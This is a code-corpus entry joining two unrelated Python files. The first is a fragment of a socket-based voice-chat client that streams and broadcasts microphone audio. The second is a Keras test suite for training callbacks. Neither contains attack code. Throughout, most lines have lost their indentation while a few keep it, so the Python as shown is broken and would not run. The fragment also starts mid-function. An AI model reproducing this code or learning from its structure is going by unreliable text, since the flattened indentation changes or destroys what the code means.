            # recvfrom returns a (data, address) tuple; accumulate only the payload
            if to_read > (4 * CHUNK):
                data, _ = self._sock.recvfrom(4 * CHUNK)
            else:
                data, _ = self._sock.recvfrom(to_read)
            databytes += data
        return databytes
def _handle_audio_out(self):
while True:
data = self._stream.read(CHUNK, exception_on_overflow=False)
data_chunk = array('h', data)
volume = max(data_chunk)
self._sock.sendto(data, ('<broadcast>', self._port))
def tcp_server():
def SendAudio():
while True:
data = stream.read(CHUNK, exception_on_overflow=False)
data_chunk = array('h', data)
volume = max(data_chunk)
client.sendall(data)
def RecieveAudio():
while True:
data = recvall(BufferSize)
stream.write(data)
def recvall(size):
databytes = b''
while len(databytes) != size:
to_read = size - len(databytes)
if to_read > (4 * CHUNK):
databytes += client.recv(4 * CHUNK)
else:
databytes += client.recv(to_read)
return databytes
client = socket(family=AF_INET, type=SOCK_STREAM)
client.connect((HOST, PORT))
audio = pyaudio.PyAudio()
stream = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK)
    # Thread.start() returns None, so there is no point keeping the return value
    Thread(target=RecieveAudio).start()
    Thread(target=SendAudio).start()
def voice_server():
_socket = socket(AF_INET, SOCK_DGRAM)
while 1:
message = input("> ")
# encode the message
message = message.encode()
# send the message
_socket.sendto(message, ("127.0.0.1", 6666))
# output the response (if any)
data, ip = _socket.recvfrom(1024)
print("{}: {}".format(ip, data.decode()))
def broadcast_receive():
import socket
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
client.bind(("", 37020))
while True:
data, addr = client.recvfrom(1024)
print("received message: %s" % data)
if __name__ == '__main__':
client = Client()
client.start()
|
test_callbacks.py
|
import os
import multiprocessing
import numpy as np
import pytest
from numpy.testing import assert_allclose
from csv import reader
from csv import Sniffer
import shutil
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential, Model
from keras.layers import Input, Dense, Dropout, add, dot, Lambda, Layer
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.pooling import GlobalAveragePooling1D
from keras.layers.pooling import GlobalAveragePooling2D
from keras.utils.test_utils import get_test_data
from keras.utils.generic_utils import to_list
from keras.utils.generic_utils import unpack_singleton
from keras import backend as K
from keras.utils import np_utils
try:
from unittest.mock import patch
except:
from mock import patch
input_dim = 2
num_hidden = 4
num_classes = 2
batch_size = 5
train_samples = 20
test_samples = 20
def data_generator(x, y, batch_size):
x = to_list(x)
y = to_list(y)
max_batch_index = len(x[0]) // batch_size
i = 0
while 1:
x_batch = [array[i * batch_size: (i + 1) * batch_size] for array in x]
x_batch = unpack_singleton(x_batch)
y_batch = [array[i * batch_size: (i + 1) * batch_size] for array in y]
y_batch = unpack_singleton(y_batch)
yield x_batch, y_batch
i += 1
i = i % max_batch_index
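# data_generator cycles through x and y forever in batch_size slices; when a model
# has a single input or output, unpack_singleton collapses the one-element list
# back to a bare array so the yielded batch matches what fit_generator expects.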
# Changing the default arguments of get_test_data.
def get_data_callbacks(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes):
return get_test_data(num_train=num_train,
num_test=num_test,
input_shape=input_shape,
classification=classification,
num_classes=num_classes)
def test_TerminateOnNaN():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN()]
model = Sequential()
initializer = initializers.Constant(value=1e5)
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
kernel_initializer=initializer))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
# case 1 fit
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
history = model.fit_generator(data_generator(X_train, y_train, batch_size),
len(X_train),
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
def test_stop_training_csv(tmpdir):
np.random.seed(1337)
fp = str(tmpdir / 'test.csv')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)]
model = Sequential()
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(X_train) // batch_size
tot = 0
while 1:
if tot > 3 * len(X_train):
yield (np.ones([batch_size, input_dim]) * np.nan,
np.ones([batch_size, num_classes]) * np.nan)
else:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
tot += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train) // batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in reader(f):
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
os.remove(fp)
def test_ModelCheckpoint(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'checkpoint.h5')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
assert os.path.isfile(filepath.format(epoch=2))
assert os.path.isfile(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not tmpdir.listdir()
def test_EarlyStopping():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
def test_EarlyStopping_reuse():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_patience():
class DummyModel(object):
def __init__(self):
self.stop_training = False
def get_weights(self):
return []
def set_weights(self, weights):
pass
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040, 0.1019]
# Should stop after epoch 3,
# as the loss has not improved after patience=2 epochs.
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
assert epochs_trained == 3
def test_EarlyStopping_baseline():
class DummyModel(object):
def __init__(self):
self.stop_training = False
def get_weights(self):
return []
def set_weights(self, weights):
pass
def baseline_tester(acc_levels):
early_stop = callbacks.EarlyStopping(monitor='val_acc', baseline=0.75,
patience=2)
early_stop.model = DummyModel()
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(acc_levels)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_acc': acc_levels[epoch]})
if early_stop.model.stop_training:
break
return epochs_trained
acc_levels = [0.55, 0.76, 0.81, 0.81]
baseline_met = baseline_tester(acc_levels)
acc_levels = [0.55, 0.74, 0.81, 0.81]
baseline_not_met = baseline_tester(acc_levels)
# All epochs should run because baseline was met in second epoch
assert baseline_met == 4
# Baseline was not met by second epoch and should stop
assert baseline_not_met == 2
def test_EarlyStopping_final_weights():
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
    # The best configuration is in epoch 2 (loss = 0.1000),
    # so with patience=2 we end up at epoch 4
    assert early_stop.model.get_weights() == 4
def test_EarlyStopping_final_weights_when_restoring_model_weights():
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
assert early_stop.model.get_weights() == 2
def test_LearningRateScheduler():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
    # This should reduce the LR after the first epoch (due to the high min_delta).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1,
min_delta=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert_allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1,
min_delta=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert_allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
def test_ReduceLROnPlateau_patience():
class DummyOptimizer(object):
def __init__(self):
self.lr = K.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = callbacks.ReduceLROnPlateau(monitor='val_loss',
patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(K.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
assert all([lr == 1.0 for lr in lrs[:-1]]) and lrs[-1] < 1.0
def test_ReduceLROnPlateau_backwards_compatibility():
import warnings
with warnings.catch_warnings(record=True) as ws:
reduce_on_plateau = callbacks.ReduceLROnPlateau(epsilon=1e-13)
# Check if warnings are disabled
if os.environ.get("PYTHONWARNINGS") != "ignore":
assert "`epsilon` argument is deprecated" in str(ws[0].message)
assert not hasattr(reduce_on_plateau, 'epsilon')
assert hasattr(reduce_on_plateau, 'min_delta')
assert reduce_on_plateau.min_delta == 1e-13
def test_CSVLogger(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'log.tsv')
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
import re
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = " ".join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
assert not tmpdir.listdir()
@pytest.mark.skipif((K.backend() == 'mxnet'),
reason='MXNet backend does not support it yet.')
@pytest.mark.parametrize('update_freq', ['batch', 'epoch', 9])
def test_TensorBoard(tmpdir, update_freq):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
class DummyStatefulMetric(Layer):
def __init__(self, name='dummy_stateful_metric', **kwargs):
super(DummyStatefulMetric, self).__init__(name=name, **kwargs)
self.stateful = True
self.state = K.variable(value=0, dtype='int32')
def reset_states(self):
pass
def __call__(self, y_true, y_pred):
return self.state
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy', DummyStatefulMetric()])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq, embeddings_freq=1):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=embeddings_freq,
embeddings_layer_names=['dense_1'],
embeddings_data=X_test,
batch_size=5,
update_freq=update_freq)]
# fit without validation data
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0),
epochs=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=0), epochs=2)
# fit generator without validation data
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0,
embeddings_freq=0))
# fit generator with validation data and accuracy
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=2,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq, embeddings_freq=1):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=embeddings_freq,
embeddings_layer_names=['dense_1'],
embeddings_data=X_test,
batch_size=5)]
# fit without validation data should raise ValueError if histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=1), epochs=3)
assert 'validation_data must be provided' in str(raised_exception.value)
train_generator = data_generator(X_train, y_train, batch_size)
validation_generator = data_generator(X_test, y_test, batch_size)
# fit generator without validation data should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(train_generator,
len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
# fit generator with validation data generator should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(train_generator, len(X_train), epochs=2,
validation_data=validation_generator,
validation_steps=1,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
@pytest.mark.skipif((K.backend() == 'mxnet'),
reason='MXNet backend does not support Lambda yet.')
def test_TensorBoard_multi_input_output(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks(
input_shape=(input_dim, input_dim))
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
inp1 = Input((input_dim, input_dim))
inp2 = Input((input_dim, input_dim))
inp_3d = add([inp1, inp2])
inp_2d = GlobalAveragePooling1D()(inp_3d)
# test a layer with a list of output tensors
inp_pair = Lambda(lambda x: x)([inp_3d, inp_2d])
hidden = dot(inp_pair, axes=-1)
hidden = Dense(num_hidden, activation='relu')(hidden)
hidden = Dropout(0.1)(hidden)
output1 = Dense(num_classes, activation='softmax')(hidden)
output2 = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=[inp1, inp2], outputs=[output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq, embeddings_freq=1):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=embeddings_freq,
embeddings_layer_names=['dense_1'],
embeddings_data=[X_test] * 2,
batch_size=5)]
# fit without validation data
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0),
epochs=3)
# fit with validation data and accuracy
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
train_generator = data_generator([X_train] * 2, [y_train] * 2, batch_size)
# fit generator without validation data
model.fit_generator(train_generator, len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0,
embeddings_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(train_generator, len(X_train), epochs=2,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@pytest.mark.skipif((K.backend() == 'mxnet'),
reason='MXNet backend does not support it yet.')
def test_TensorBoard_convnet(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
input_shape = (16, 16, 3)
(x_train, y_train), (x_test, y_test) = get_data_callbacks(
num_train=500,
num_test=200,
input_shape=input_shape)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
model = Sequential([
Conv2D(filters=8, kernel_size=3,
activation='relu',
input_shape=input_shape),
MaxPooling2D(pool_size=2),
Conv2D(filters=4, kernel_size=(3, 3),
activation='relu', padding='same'),
GlobalAveragePooling2D(),
Dense(num_classes, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
write_images=True, write_grads=True,
batch_size=16)
cbks = [tsb]
model.summary()
history = model.fit(x_train, y_train, epochs=2, batch_size=16,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def test_TensorBoard_display_float_from_logs(tmpdir):
filepath = str(tmpdir / 'logs')
input_shape = (3,)
(x_train, y_train), _ = get_data_callbacks(num_train=10,
num_test=0,
input_shape=input_shape)
y_train = np_utils.to_categorical(y_train)
model = Sequential([
Dense(num_classes, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop')
class CustomCallback(callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
logs['test'] = 0.
tsb = callbacks.TensorBoard(log_dir=filepath,
batch_size=16)
cbks = [CustomCallback(), tsb]
model.fit(x_train, y_train, epochs=2, batch_size=16,
callbacks=cbks,
verbose=0)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def test_CallbackValData():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=1,
validation_data=(X_test, y_test),
callbacks=[cbk2])
# callback validation data should always have x, y, and sample weights
assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
assert cbk.validation_data[0] is cbk2.validation_data[0]
assert cbk.validation_data[1] is cbk2.validation_data[1]
assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
def test_LambdaCallback():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and
# be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(
on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
p.join()
assert not p.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(tmpdir):
import shutil
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def tests_RemoteMonitor():
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.RemoteMonitor()]
with patch('requests.post'):
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
def tests_RemoteMonitorWithJsonPayload():
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.RemoteMonitor(send_as_json=True)]
with patch('requests.post'):
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
def mxnet_model_checkpoint_test_helper(monitor, save_best_only, mode, prefix='test', epochs=1):
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.MXNetModelCheckpoint(prefix, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=epochs)
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_auto_mode():
mxnet_model_checkpoint_test_helper(monitor='val_loss', save_best_only=False, mode='auto')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_min_mode():
mxnet_model_checkpoint_test_helper(monitor='val_loss', save_best_only=False, mode='min')
